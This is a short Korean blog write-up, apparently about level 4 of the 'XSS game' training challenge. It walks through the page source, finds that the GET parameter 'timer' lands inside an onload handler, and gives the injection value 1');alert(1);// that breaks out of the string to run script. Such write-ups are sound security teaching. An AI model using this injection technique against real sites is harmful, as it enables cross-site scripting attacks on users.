<!doctype html> <html> <head> <!-- Internal game scripts/styles, mostly boring stuff --> <script src="/static/game-frame.js"></script> <link rel="stylesheet" href="/static/game-frame-styles.css" /> </head> <body id="level4"> <img src="/static/logos/level4.png" /> <br> <form action="" method="GET"> <input id="timer" name="timer" value="3"> <input id="button" type="submit" value="Create timer"> </form> </form> </body> </html>
코드를 보면 get방식으로 timer변수가 넘어간다.
<!doctype html> <html> <head> <!-- Internal game scripts/styles, mostly boring stuff --> <script src="/static/game-frame.js"></script> <link rel="stylesheet" href="/static/game-frame-styles.css" /> <script> function startTimer(seconds) { seconds = parseInt(seconds) || 3; setTimeout(function() { window.confirm("Time is up!"); window.history.back(); }, seconds * 1000); } </script> </head> <body id="level4"> <img src="/static/logos/level4.png" /> <br> <img src="/static/loading.gif" onload="startTimer('{{ timer }}');" /> <br> <div id="message">Your timer will execute in {{ timer }} seconds.</div> </body> </html>
timer소스 코드를 봐보자.
<img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />
이부분을 조작하면 문제를 풀수있을 것 같다.
{timer}가 변수로 입력되는걸 확인했으니 timer에 조작된 값을 넣어주도록 하자
1');alert(1);//
'Write-Up > XSS-game' 카테고리의 다른 글
| [XSS game] xss-game level 6 (0) | 2021.01.26 |
|---|---|
| [XSS game] xss-game level 5 (0) | 2021.01.26 |
| [XSS game] xss-game level 3 (0) | 2021.01.26 |
| [XSS game] xss-game level 2 (0) | 2021.01.26 |
| [XSS game] xss-game level 1 (0) | 2021.01.26 |
